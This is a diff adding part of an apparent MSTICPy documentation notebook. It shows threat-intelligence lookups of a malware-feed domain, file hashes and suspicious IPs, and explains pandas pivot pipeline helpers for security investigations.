+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>Ioc</th>\n",
+       "      <th>IocType</th>\n",
+       "      <th>SafeIoc</th>\n",
+       "      <th>QuerySubtype</th>\n",
+       "      <th>Provider</th>\n",
+       "      <th>Result</th>\n",
+       "      <th>Severity</th>\n",
+       "      <th>Details</th>\n",
+       "      <th>RawResult</th>\n",
+       "      <th>Reference</th>\n",
+       "      <th>Status</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>fkksjobnn43.org</td>\n",
+       "      <td>dns</td>\n",
+       "      <td>fkksjobnn43.org</td>\n",
+       "      <td>None</td>\n",
+       "      <td>OTX</td>\n",
+       "      <td>True</td>\n",
+       "      <td>high</td>\n",
+       "      <td>{'pulse_count': 35, 'names': ['Jaff - Malware Domain Feed V2', 'Jaff - Malware Domain Feed V2', ...</td>\n",
+       "      <td>{'sections': ['general', 'geo', 'url_list', 'passive_dns', 'malware', 'whois', 'http_scans'], 'w...</td>\n",
+       "      <td>https://otx.alienvault.com/api/v1/indicators/domain/fkksjobnn43.org/general</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>fkksjobnn43.org</td>\n",
+       "      <td>dns</td>\n",
+       "      <td></td>\n",
+       "      <td>None</td>\n",
+       "      <td>OPR</td>\n",
+       "      <td>True</td>\n",
+       "      <td>warning</td>\n",
+       "      <td>{'rank': None, 'error': 'Domain not found'}</td>\n",
+       "      <td>{'status_code': 404, 'error': 'Domain not found', 'page_rank_integer': 0, 'page_rank_decimal': 0...</td>\n",
+       "      <td>https://openpagerank.com/api/v1.0/getPageRank?domains[0]=fkksjobnn43.org</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>fkksjobnn43.org</td>\n",
+       "      <td>dns</td>\n",
+       "      <td>fkksjobnn43.org</td>\n",
+       "      <td>None</td>\n",
+       "      <td>VirusTotal</td>\n",
+       "      <td>True</td>\n",
+       "      <td>information</td>\n",
+       "      <td>{'verbose_msg': 'Domain found in dataset', 'response_code': 1, 'detected_urls': ['http://fkksjob...</td>\n",
+       "      <td>{'undetected_downloaded_samples': [], 'whois_timestamp': 1607400917, 'detected_downloaded_sample...</td>\n",
+       "      <td>https://www.virustotal.com/vtapi/v2/domain/report</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>fkksjobnn43.org</td>\n",
+       "      <td>dns</td>\n",
+       "      <td>fkksjobnn43.org</td>\n",
+       "      <td>None</td>\n",
+       "      <td>XForce</td>\n",
+       "      <td>True</td>\n",
+       "      <td>information</td>\n",
+       "      <td>{'score': 0, 'cats': None, 'categoryDescriptions': None, 'reason': None, 'reasonDescription': 0,...</td>\n",
+       "      <td>{'result': {'url': 'fkksjobnn43.org', 'cats': {'General Business': True}, 'score': 1, 'categoryD...</td>\n",
+       "      <td>https://api.xforce.ibmcloud.com/url/fkksjobnn43.org</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "               Ioc IocType          SafeIoc QuerySubtype    Provider  Result  \\\n",
+       "0  fkksjobnn43.org     dns  fkksjobnn43.org         None         OTX    True   \n",
+       "0  fkksjobnn43.org     dns                          None         OPR    True   \n",
+       "0  fkksjobnn43.org     dns  fkksjobnn43.org         None  VirusTotal    True   \n",
+       "0  fkksjobnn43.org     dns  fkksjobnn43.org         None      XForce    True   \n",
+       "\n",
+       "      Severity  \\\n",
+       "0         high   \n",
+       "0      warning   \n",
+       "0  information   \n",
+       "0  information   \n",
+       "\n",
+       "                                                                                               Details  \\\n",
+       "0  {'pulse_count': 35, 'names': ['Jaff - Malware Domain Feed V2', 'Jaff - Malware Domain Feed V2', ...   \n",
+       "0                                                          {'rank': None, 'error': 'Domain not found'}   \n",
+       "0  {'verbose_msg': 'Domain found in dataset', 'response_code': 1, 'detected_urls': ['http://fkksjob...   \n",
+       "0  {'score': 0, 'cats': None, 'categoryDescriptions': None, 'reason': None, 'reasonDescription': 0,...   \n",
+       "\n",
+       "                                                                                             RawResult  \\\n",
+       "0  {'sections': ['general', 'geo', 'url_list', 'passive_dns', 'malware', 'whois', 'http_scans'], 'w...   \n",
+       "0  {'status_code': 404, 'error': 'Domain not found', 'page_rank_integer': 0, 'page_rank_decimal': 0...   \n",
+       "0  {'undetected_downloaded_samples': [], 'whois_timestamp': 1607400917, 'detected_downloaded_sample...   \n",
+       "0  {'result': {'url': 'fkksjobnn43.org', 'cats': {'General Business': True}, 'score': 1, 'categoryD...   \n",
+       "\n",
+       "                                                                     Reference  \\\n",
+       "0  https://otx.alienvault.com/api/v1/indicators/domain/fkksjobnn43.org/general   \n",
+       "0     https://openpagerank.com/api/v1.0/getPageRank?domains[0]=fkksjobnn43.org   \n",
+       "0                            https://www.virustotal.com/vtapi/v2/domain/report   \n",
+       "0                          https://api.xforce.ibmcloud.com/url/fkksjobnn43.org   \n",
+       "\n",
+       "   Status  \n",
+       "0       0  \n",
+       "0       0  \n",
+       "0       0  \n",
+       "0       0  "
+      ]
+     },
+     "execution_count": 39,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "Dns.ti.lookup_dns(value=\"fkksjobnn43.org\")"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 40,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>Ioc</th>\n",
+       "      <th>IocType</th>\n",
+       "      <th>SafeIoc</th>\n",
+       "      <th>QuerySubtype</th>\n",
+       "      <th>Provider</th>\n",
+       "      <th>Result</th>\n",
+       "      <th>Severity</th>\n",
+       "      <th>Details</th>\n",
+       "      <th>RawResult</th>\n",
+       "      <th>Reference</th>\n",
+       "      <th>Status</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd</td>\n",
+       "      <td>sha256_hash</td>\n",
+       "      <td>02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd</td>\n",
+       "      <td>None</td>\n",
+       "      <td>VirusTotal</td>\n",
+       "      <td>True</td>\n",
+       "      <td>high</td>\n",
+       "      <td>{'verbose_msg': 'Scan finished, information embedded', 'response_code': 1, 'resource': '02a7977d...</td>\n",
+       "      <td>{'scans': {'Bkav': {'detected': True, 'version': '1.3.0.9899', 'result': 'W32.AIDetectVM.malware...</td>\n",
+       "      <td>https://www.virustotal.com/vtapi/v2/file/report</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>06b020a3fd3296bc4c7bf53307fe7b40638e7f445bdd43fac1d04547a429fdaf</td>\n",
+       "      <td>sha256_hash</td>\n",
+       "      <td>06b020a3fd3296bc4c7bf53307fe7b40638e7f445bdd43fac1d04547a429fdaf</td>\n",
+       "      <td>None</td>\n",
+       "      <td>VirusTotal</td>\n",
+       "      <td>True</td>\n",
+       "      <td>high</td>\n",
+       "      <td>{'verbose_msg': 'Scan finished, information embedded', 'response_code': 1, 'resource': '06b020a3...</td>\n",
+       "      <td>{'scans': {'Bkav': {'detected': False, 'version': '1.3.0.9899', 'result': None, 'update': '20201...</td>\n",
+       "      <td>https://www.virustotal.com/vtapi/v2/file/report</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>06c676bf8f5c6af99172c1cf63a84348628ae3f39df9e523c42447e2045e00ff</td>\n",
+       "      <td>sha256_hash</td>\n",
+       "      <td>06c676bf8f5c6af99172c1cf63a84348628ae3f39df9e523c42447e2045e00ff</td>\n",
+       "      <td>None</td>\n",
+       "      <td>VirusTotal</td>\n",
+       "      <td>True</td>\n",
+       "      <td>high</td>\n",
+       "      <td>{'verbose_msg': 'Scan finished, information embedded', 'response_code': 1, 'resource': '06c676bf...</td>\n",
+       "      <td>{'scans': {'Bkav': {'detected': True, 'version': '1.3.0.9899', 'result': 'W32.AIDetectVM.malware...</td>\n",
+       "      <td>https://www.virustotal.com/vtapi/v2/file/report</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                                                                Ioc  \\\n",
+       "0  02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd   \n",
+       "1  06b020a3fd3296bc4c7bf53307fe7b40638e7f445bdd43fac1d04547a429fdaf   \n",
+       "2  06c676bf8f5c6af99172c1cf63a84348628ae3f39df9e523c42447e2045e00ff   \n",
+       "\n",
+       "       IocType  \\\n",
+       "0  sha256_hash   \n",
+       "1  sha256_hash   \n",
+       "2  sha256_hash   \n",
+       "\n",
+       "                                                            SafeIoc  \\\n",
+       "0  02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd   \n",
+       "1  06b020a3fd3296bc4c7bf53307fe7b40638e7f445bdd43fac1d04547a429fdaf   \n",
+       "2  06c676bf8f5c6af99172c1cf63a84348628ae3f39df9e523c42447e2045e00ff   \n",
+       "\n",
+       "  QuerySubtype    Provider  Result Severity  \\\n",
+       "0         None  VirusTotal    True     high   \n",
+       "1         None  VirusTotal    True     high   \n",
+       "2         None  VirusTotal    True     high   \n",
+       "\n",
+       "                                                                                               Details  \\\n",
+       "0  {'verbose_msg': 'Scan finished, information embedded', 'response_code': 1, 'resource': '02a7977d...   \n",
+       "1  {'verbose_msg': 'Scan finished, information embedded', 'response_code': 1, 'resource': '06b020a3...   \n",
+       "2  {'verbose_msg': 'Scan finished, information embedded', 'response_code': 1, 'resource': '06c676bf...   \n",
+       "\n",
+       "                                                                                             RawResult  \\\n",
+       "0  {'scans': {'Bkav': {'detected': True, 'version': '1.3.0.9899', 'result': 'W32.AIDetectVM.malware...   \n",
+       "1  {'scans': {'Bkav': {'detected': False, 'version': '1.3.0.9899', 'result': None, 'update': '20201...   \n",
+       "2  {'scans': {'Bkav': {'detected': True, 'version': '1.3.0.9899', 'result': 'W32.AIDetectVM.malware...   \n",
+       "\n",
+       "                                         Reference  Status  \n",
+       "0  https://www.virustotal.com/vtapi/v2/file/report       0  \n",
+       "1  https://www.virustotal.com/vtapi/v2/file/report       0  \n",
+       "2  https://www.virustotal.com/vtapi/v2/file/report       0  "
+      ]
+     },
+     "execution_count": 40,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "hashes = [\n",
+    "    \"02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd\",\n",
+    "    \"06b020a3fd3296bc4c7bf53307fe7b40638e7f445bdd43fac1d04547a429fdaf\",\n",
+    "    \"06c676bf8f5c6af99172c1cf63a84348628ae3f39df9e523c42447e2045e00ff\",\n",
+    "]\n",
+    "\n",
+    "File.ti.lookup_file_hash_VirusTotal(hashes)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Lookup from a DataFrame\n",
+    "\n",
+    "To specify the source column you can use either \"column\" or \"obs_column\""
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 41,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>hash</th>\n",
+       "      <th>ref</th>\n",
+       "      <th>desc</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd</td>\n",
+       "      <td>item_0</td>\n",
+       "      <td>stuff</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>06b020a3fd3296bc4c7bf53307fe7b40638e7f445bdd43fac1d04547a429fdaf</td>\n",
+       "      <td>item_1</td>\n",
+       "      <td>stuff</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>06c676bf8f5c6af99172c1cf63a84348628ae3f39df9e523c42447e2045e00ff</td>\n",
+       "      <td>item_2</td>\n",
+       "      <td>stuff</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                                                               hash     ref  \\\n",
+       "0  02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd  item_0   \n",
+       "1  06b020a3fd3296bc4c7bf53307fe7b40638e7f445bdd43fac1d04547a429fdaf  item_1   \n",
+       "2  06c676bf8f5c6af99172c1cf63a84348628ae3f39df9e523c42447e2045e00ff  item_2   \n",
+       "\n",
+       "    desc  \n",
+       "0  stuff  \n",
+       "1  stuff  \n",
+       "2  stuff  "
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>Ioc</th>\n",
+       "      <th>IocType</th>\n",
+       "      <th>SafeIoc</th>\n",
+       "      <th>QuerySubtype</th>\n",
+       "      <th>Provider</th>\n",
+       "      <th>Result</th>\n",
+       "      <th>Severity</th>\n",
+       "      <th>Details</th>\n",
+       "      <th>RawResult</th>\n",
+       "      <th>Reference</th>\n",
+       "      <th>Status</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd</td>\n",
+       "      <td>sha256_hash</td>\n",
+       "      <td>02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd</td>\n",
+       "      <td>None</td>\n",
+       "      <td>VirusTotal</td>\n",
+       "      <td>True</td>\n",
+       "      <td>high</td>\n",
+       "      <td>{'verbose_msg': 'Scan finished, information embedded', 'response_code': 1, 'resource': '02a7977d...</td>\n",
+       "      <td>{'scans': {'Bkav': {'detected': True, 'version': '1.3.0.9899', 'result': 'W32.AIDetectVM.malware...</td>\n",
+       "      <td>https://www.virustotal.com/vtapi/v2/file/report</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>06b020a3fd3296bc4c7bf53307fe7b40638e7f445bdd43fac1d04547a429fdaf</td>\n",
+       "      <td>sha256_hash</td>\n",
+       "      <td>06b020a3fd3296bc4c7bf53307fe7b40638e7f445bdd43fac1d04547a429fdaf</td>\n",
+       "      <td>None</td>\n",
+       "      <td>VirusTotal</td>\n",
+       "      <td>True</td>\n",
+       "      <td>high</td>\n",
+       "      <td>{'verbose_msg': 'Scan finished, information embedded', 'response_code': 1, 'resource': '06b020a3...</td>\n",
+       "      <td>{'scans': {'Bkav': {'detected': False, 'version': '1.3.0.9899', 'result': None, 'update': '20201...</td>\n",
+       "      <td>https://www.virustotal.com/vtapi/v2/file/report</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>06c676bf8f5c6af99172c1cf63a84348628ae3f39df9e523c42447e2045e00ff</td>\n",
+       "      <td>sha256_hash</td>\n",
+       "      <td>06c676bf8f5c6af99172c1cf63a84348628ae3f39df9e523c42447e2045e00ff</td>\n",
+       "      <td>None</td>\n",
+       "      <td>VirusTotal</td>\n",
+       "      <td>True</td>\n",
+       "      <td>high</td>\n",
+       "      <td>{'verbose_msg': 'Scan finished, information embedded', 'response_code': 1, 'resource': '06c676bf...</td>\n",
+       "      <td>{'scans': {'Bkav': {'detected': True, 'version': '1.3.0.9899', 'result': 'W32.AIDetectVM.malware...</td>\n",
+       "      <td>https://www.virustotal.com/vtapi/v2/file/report</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                                                                Ioc  \\\n",
+       "0  02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd   \n",
+       "1  06b020a3fd3296bc4c7bf53307fe7b40638e7f445bdd43fac1d04547a429fdaf   \n",
+       "2  06c676bf8f5c6af99172c1cf63a84348628ae3f39df9e523c42447e2045e00ff   \n",
+       "\n",
+       "       IocType  \\\n",
+       "0  sha256_hash   \n",
+       "1  sha256_hash   \n",
+       "2  sha256_hash   \n",
+       "\n",
+       "                                                            SafeIoc  \\\n",
+       "0  02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd   \n",
+       "1  06b020a3fd3296bc4c7bf53307fe7b40638e7f445bdd43fac1d04547a429fdaf   \n",
+       "2  06c676bf8f5c6af99172c1cf63a84348628ae3f39df9e523c42447e2045e00ff   \n",
+       "\n",
+       "  QuerySubtype    Provider  Result Severity  \\\n",
+       "0         None  VirusTotal    True     high   \n",
+       "1         None  VirusTotal    True     high   \n",
+       "2         None  VirusTotal    True     high   \n",
+       "\n",
+       "                                                                                               Details  \\\n",
+       "0  {'verbose_msg': 'Scan finished, information embedded', 'response_code': 1, 'resource': '02a7977d...   \n",
+       "1  {'verbose_msg': 'Scan finished, information embedded', 'response_code': 1, 'resource': '06b020a3...   \n",
+       "2  {'verbose_msg': 'Scan finished, information embedded', 'response_code': 1, 'resource': '06c676bf...   \n",
+       "\n",
+       "                                                                                             RawResult  \\\n",
+       "0  {'scans': {'Bkav': {'detected': True, 'version': '1.3.0.9899', 'result': 'W32.AIDetectVM.malware...   \n",
+       "1  {'scans': {'Bkav': {'detected': False, 'version': '1.3.0.9899', 'result': None, 'update': '20201...   \n",
+       "2  {'scans': {'Bkav': {'detected': True, 'version': '1.3.0.9899', 'result': 'W32.AIDetectVM.malware...   \n",
+       "\n",
+       "                                         Reference  Status  \n",
+       "0  https://www.virustotal.com/vtapi/v2/file/report       0  \n",
+       "1  https://www.virustotal.com/vtapi/v2/file/report       0  \n",
+       "2  https://www.virustotal.com/vtapi/v2/file/report       0  "
+      ]
+     },
+     "execution_count": 41,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "hashes_df = pd.DataFrame(\n",
+    "    [(fh, f\"item_{idx}\", \"stuff\") for idx, fh in enumerate(hashes)],\n",
+    "    columns=[\"hash\", \"ref\", \"desc\"],\n",
+    ")\n",
+    "display(hashes_df)\n",
+    "File.ti.lookup_file_hash_VirusTotal(data=hashes_df, column=\"hash\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Chaining pivot and other functions\n",
+    "\n",
+    "Because pivot functions can take dataframes as inputs and return them\n",
+    "as outputs, you can create chains of pivot functions.\n",
+    "You can also add other items to the chain that input or output\n",
+    "dataframes.\n",
+    "\n",
+    "For example, you could build a chain that included the following:\n",
+    "- take IP addresses from firewall alerts\n",
+    "- lookup the IPs in Threat Intel providers filtering those that have high severity\n",
+    "- lookup the any remote logon events sourced at those IPs\n",
+    "- display a timeline of the logons\n",
+    "\n",
+    "To make building these types of pipelines easier we've implemented some\n",
+    "pandas helper functions. These are available in the `mp_pivot`\n",
+    "property of pandas DataFrames, once Pivot is imported.\n",
+    "\n",
+    "### mp_pivot.run\n",
+    "\n",
+    "`run` lets you run a pivot function as a pandas pipeline operation.\n",
+    " \n",
+    "Let's take an example of a simple pivot function using a dataframe as input\n",
+    "```\n",
+    "    IpAddress.util.whois(data=my_df, column=\"Ioc\")\n",
+    "```\n",
+    "\n",
+    "We can us mp_pivot.run to do this:\n",
+    "```\n",
+    " (\n",
+    "     my_df\n",
+    "     .query(\"UserCount > 1\")\n",
+    "     .mp_pivot.run(IpAddress.util.whois, column=\"Ioc\")\n",
+    "     .drop_duplicates()\n",
+    " )\n",
+    "```\n",
+    "The pandas extension takes care of the `data=my_df` parameter. We still have\n",
+    "to add any other required parameters (like the column specification in this case.\n",
+    "When it runs it returns its output as a DataFrame and the next operation\n",
+    "(drop_duplicates()) runs on this output.\n",
+    "\n",
+    "Depending on the scenario you might want to preserve the existing dataframe\n",
+    "contents (most of the pivot functions only return the results of their specific\n",
+    "operation - e.g. whois returns ASN information for an IP address). You\n",
+    "can carry the columns of the input dataframe over to the output from \n",
+    "the pivot function by adding a `join` parameter to the mp_pivot.run() call.\n",
+    "Use a \"left\" to keep all of the input rows regardless of whether the pivot\n",
+    "function returned a result for that row.\n",
+    "Use an \"inner\" join to return only rows where the input had a positive result\n",
+    "in the pivot function.\n",
+    "```\n",
+    "    .mp_pivot.run(IpAddress.util.whois, column=\"Ioc\", join=\"inner\")\n",
+    "```\n",
+    "\n",
+    "There are also a couple of convenience functions. These only work in\n",
+    "an IPython/Jupyter environment.\n",
+    "\n",
+    "### mp_pivot.display\n",
+    "\n",
+    "`mp_pivot.display` will display the intermediate results of the dataframe in the middle\n",
+    "of a pipeline. It does not change the data at all, but does give you the \n",
+    "chance to display a view of the data partway through processing. This\n",
+    "is useful for debugging but its main purpose is to give you a way to\n",
+    "show partial results without having to break the pipeline into pieces\n",
+    "and create unnecessary throw-away variables that will add bulk to your\n",
+    "code and clutter to your memory.\n",
+    "\n",
+    "`display` supports some options that you can use to modify the displayed\n",
+    "output:\n",
+    "\n",
+    "- title - displays a title above the data\n",
+    "- cols - a list of columns to display (others are hidden)\n",
+    "- query - you can filter the output using a df.query() string. See https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.query.html?highlight=query#pandas.DataFrame.query\n",
+    "  for more details\n",
+    "- head - limits the display to the first `head` rows\n",
+    "\n",
+    "These options do not affect the data being passed through the pipeline -\n",
+    "only how the intermediate output is displayed.\n",
+    "\n",
+    "### mp_pivot.tee\n",
+    "`mp_pivot.tee` behaves a little like the Linux \"tee\" command. It allows the\n",
+    "data to pass through unchanged but allows you to create a variable that\n",
+    "is a snapshot of the data at that point in the pipeline. It takes\n",
+    "a parameter `var_name` and assigns the current DataFrame instance\n",
+    "to that name. So, when your pipeline has run you can access partial results (again,\n",
+    "without having to break up your pipeline to do so).\n",
+    "\n",
+    "By default, it will not overwrite an existing variable of the same name\n",
+    "unless you specify `clobber=True` in the call to `tee`.\n",
+    "\n",
+    "### mp_pivot.tee_exec\n",
+    "behaves similarly to the \"tee\" function above except that it\n",
+    "will try to execute the DataFrame accessor function on the input\n",
+    "DataFrame. The name of the function (as a string) can be passed named as the value of the\n",
+    "`df_func` named parameter, or the first positional.\n",
+    "The function **must** be a method of a pandas DataFrame - this includes\n",
+    "built-in functions such as `.query`, `.sort_values` or a custom function\n",
+    "added as a custom pd accessor function (see \n",
+    "[Extending pandas](https://pandas.pydata.org/pandas-docs/stable/development/extending.html?highlight=accessor))\n",
+    "\n",
+    "`mp_pivot.tee_exec` allows the input\n",
+    "data to pass through unchanged but will also send\n",
+    "a snapshot of the data at that point in the pipeline to the named function.\n",
+    "You can also pass arbitrary other named arguments to the `tee_exec`. These arguments will be passed to the `df_func` function.\n",
+    "\n",
+    "### Example\n",
+    "The example below shows the use of mp_pivot.run and mp_pivot.display.\n",
+    "\n",
+    "This takes an existing DataFrame - suspcious_ips - and:\n",
+    "\n",
+    "- displays the top 5 rows of the dataframe\n",
+    "- checks for threat intelligence reports on any of the IP addresses\n",
+    "- uses pandas `query` to filter only the high severity hits\n",
+    "- calls the whois pivot function to obtain ownership information for these IPs\n",
+    "  (note that we join the results of the previous step here usine `join='left'`\n",
+    "  so our output will be all TI result data plus whois data\n",
+    "- calls a pivot data query to check for Azure Active Directory logins that\n",
+    "  have an IP address source that matches any of these addresses.\n",
+    "  \n",
+    "The final step uses another MSTICPy pandas extension to plot the login attempts\n",
+    "on a timeline chart."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 42,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "suspicious_ips = [\n",
+    "    \"113.190.36.2\",\n",
+    "    \"118.163.135.17\",\n",
+    "    \"118.163.135.18\",\n",
+    "    \"118.163.97.19\",\n",
+    "    \"125.34.240.33\",\n",
+    "    \"135.26.152.186\",\n",
+    "    \"165.225.17.6\",\n",
+    "    \"177.135.101.5\",\n",
+    "    \"177.159.99.89\",\n",
+    "    \"177.19.187.79\",\n",
+    "    \"186.215.197.15\",\n",
+    "    \"186.215.198.137\",\n",
+    "    \"189.59.5.81\",\n",
+    "]\n",
+    "suspicious_ips_df = pd.DataFrame(suspicious_ips, columns=[\"IPAddress\"])"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "(\n",
+    "    suspicious_ips_df\n",
+    "    .mp_pivot.display(title=f\"Initial IPs {len(suspicious_ips)}\", head=5)\n",
+    "    # Lookup IPs at VT\n",
+    "    .mp_pivot.run(IpAddress.ti.lookup_ipv4_VirusTotal, column=\"IPAddress\")\n",
+    "    # Filter on high severity\n",
+    "    .query(\"Severity == 'high'\")\n",
+    "    .mp_pivot.run(IpAddress.util.whois, column=\"Ioc\", join=\"left\")\n",
+    "    .mp_pivot.display(title=\"TI High Severity IPs\", head=5)\n",
+    "    # Query IPs that have login attempts\n",
+    "    .mp_pivot.run(IpAddress.AzureSentinel.list_aad_signins_for_ip, ip_address_list=\"Ioc\")\n",
+    "    # Send the output of this to a plot\n",
+    "    .mp_timeline.plot(\n",
+    "        title=\"High Severity IPs with Logon attempts\",\n",
+    "        source_columns=[\"UserPrincipalName\", \"IPAddress\", \"ResultType\", \"ClientAppUsed\", \"UserAgent\", \"Location\"],\n",
+    "        group_by=\"UserPrincipalName\"\n",
+    "    )\n",
+    ")"
+   ]
+  },
+  {
+   "attachments": {
+    "0f98df03-f8db-4ddc-a8cd-2535ff315af5.png": {
+     "image/png": "iVBORw0KGgoAAAANSUhEUgAABdwAAAUuCAYAAABgb/R2AAAgAElEQVR4nOzd+7/dVX0n/vlHhrNzkhBAKCqQ5EQuXqp0vKEokSQ2sUqnKqNM/eKNW1rT0W9rnamKfjuPaEWJ5Ksw2taRPgac3oJIYYSk8GVmZFphWqYqViOEoIGc9f3hnLXP2muv9dmffc7nXDjn+Xw81uPR7nwu63M7PHyt9Xl//kUAAAAAAAAW7F8sdwcAAAAAAGA1ELgDAAAAAEAHBO4AAAAAANABgTsAAAAAAHRA4A4AAAAAAB0QuAMAAAAAQAcE7gAAAAAA0AGBOwAAAAAAdEDgDgAAAAAAHRC4AwAAAABABwTuAAAAAADQAYE7AAAAAAB0QOAOAAAAAAAdELgDAAAAAEAHBO4AAAAAANABgTsAAAAAAHRA4A4AAAAAAB0QuAMAAAAAQAcE7gAAAAAA0AGBOwAAAAAAdEDgDgAAAAAAHRC4AwAAAABABwTuAAAAAADQAYE7AAAAAAB0QOAOAAAAAAAdELivQPv3nBp6vV44d/vNy90VAAAAAABaEriP5Udh/9tfHCZ7G8LL3vGV8LPpxdmLwH0lOBH+8mOvDBt6k+GFL/t34XvPLXd/AAAAAICVrvPA/ehte0Kv1xu/TWwNN95/sr+dQ/suCr1eL6w75fLwrXmEndPh1vDG9TPbvuTa+1uvF/d72ubrhkLWn3//98NL1vUW1K82ljZwPxF+eOTW8OFfuzhsfuEZYX3/eqwPLzh7S7jkXZ8M/+0ffr4E/VhZpsM3wuWb5u7NT3935SXu0+HBcPWF66v3Svrvxbb+9HDOha8P137yUPjBL5bhAAAAAABglRG4Z5oC93SG+69c+Y3n/Qz3E0/8RfjAG14UJkdcm8neW8NfnBy9vdVlbob7ln/1H1bkDPcFB+5J23jWa8Ln/ub4MhwFAAAAAKwenQfuJ59+Ijz22GND7cE/fMtssL457Pvm3xeWeTz8LJlluzID96WxFIH7yRMPhKtfunH2mkyGc176rvDv/+gb4f5HHw2PPfZY+PY3vxh+5/1vDOdtXNzZ/M9nPzj85Zk3A07bE+58dulHJMYJ3F/0hk8NPG9///BfhVs+81vh